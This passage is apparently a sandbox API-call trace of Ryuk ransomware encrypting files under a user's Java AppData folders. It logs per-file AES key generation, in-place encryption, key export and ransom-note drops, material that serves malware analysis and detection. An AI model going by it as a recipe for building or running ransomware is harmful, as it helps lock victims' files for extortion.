lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0147.777] CloseHandle (hObject=0x190) returned 1 [0147.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0147.779] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.779] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.779] SetLastError (dwErrCode=0x0) [0147.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.780] GetLastError () returned 0x0 [0147.780] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0147.781] CloseHandle (hObject=0x194) returned 1 [0147.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0147.782] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.782] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.782] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab", dwFileAttributes=0x80) returned 1 [0147.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.785] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=581730) returned 1 [0147.785] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=581730) returned 1 [0147.785] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x8df40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.785] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.786] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.786] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.786] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.786] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.786] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8e062, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x8e062, lpOverlapped=0x0) returned 1 [0147.797] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.797] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8e062, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8e070) returned 1 [0147.800] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.800] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8e070, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x8e070, lpOverlapped=0x0) returned 1 [0147.802] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.802] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.802] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.802] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.802] CloseHandle (hObject=0x198) returned 1 [0147.812] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.816] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.816] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.816] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.816] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.817] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi", dwFileAttributes=0x80) returned 1 [0147.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.817] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=185344) returned 1 [0147.817] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=185344) returned 1 [0147.817] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x2d2de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.817] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.818] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.818] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.818] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.819] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.819] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2d400, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x2d400, lpOverlapped=0x0) returned 1 [0147.822] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.822] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2d400, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2d410) returned 1 [0147.823] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.823] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2d410, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x2d410, lpOverlapped=0x0) returned 1 [0147.823] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.824] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.824] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.824] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.824] CloseHandle (hObject=0x198) returned 1 [0147.839] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.843] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.844] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.844] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0147.844] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0147.844] SetLastError (dwErrCode=0x0) [0147.844] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.845] GetLastError () returned 0x0 [0147.845] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0147.846] CloseHandle (hObject=0x194) returned 1 [0147.846] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.846] SetLastError (dwErrCode=0x0) [0147.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.846] GetLastError () returned 0xb7 [0147.846] CloseHandle (hObject=0x194) returned 1 [0147.846] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0147.847] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.847] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.847] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.847] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties", dwFileAttributes=0x80) returned 1 [0147.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.848] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=719) returned 1 [0147.848] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=719) returned 1 [0147.848] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1ad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.848] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.849] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.849] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.849] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.849] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.849] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2cf, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x2cf, lpOverlapped=0x0) returned 1 [0147.849] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.850] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2cf, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x2d0) returned 1 [0147.850] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.850] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x2d0, lpOverlapped=0x0) returned 1 [0147.850] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.850] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.850] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.850] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.850] CloseHandle (hObject=0x198) returned 1 [0147.876] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.880] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.880] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.880] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.880] SetLastError (dwErrCode=0x0) [0147.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.884] GetLastError () returned 0x0 [0147.884] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.888] CloseHandle (hObject=0x198) returned 1 [0147.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0147.889] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.889] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0147.889] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0147.889] SetLastError (dwErrCode=0x0) [0147.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\security\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.890] GetLastError () returned 0x0 [0147.890] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.890] CloseHandle (hObject=0x198) returned 1 [0147.891] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.891] SetLastError (dwErrCode=0x0) [0147.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.891] GetLastError () returned 0xb7 [0147.891] CloseHandle (hObject=0x198) returned 1 [0147.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0147.891] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.891] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.891] SetLastError (dwErrCode=0x0) [0147.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0147.891] GetLastError () returned 0x0 [0147.891] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0147.892] CloseHandle (hObject=0x19c) returned 1 [0147.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0147.892] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0147.892] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0147.892] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0147.893] SetLastError (dwErrCode=0x0) [0147.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\si\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\si\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0147.893] GetLastError () returned 0x0 [0147.893] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0147.894] CloseHandle (hObject=0x19c) returned 1 [0147.894] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0147.894] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0147.895] SetLastError (dwErrCode=0x0) [0147.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\tmp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.895] GetLastError () returned 0xb7 [0147.895] CloseHandle (hObject=0x198) returned 1 [0147.895] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0147.895] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0147.895] SetLastError (dwErrCode=0x0) [0147.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.895] GetLastError () returned 0xb7 [0147.895] CloseHandle (hObject=0x194) returned 1 [0147.895] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.895] SetLastError (dwErrCode=0x0) [0147.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.895] GetLastError () returned 0xb7 [0147.895] CloseHandle (hObject=0x194) returned 1 [0147.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0147.896] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.896] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.896] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.896] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab", dwFileAttributes=0x80) returned 1 [0147.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.898] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=25340970) returned 1 [0147.898] GetFileSizeEx 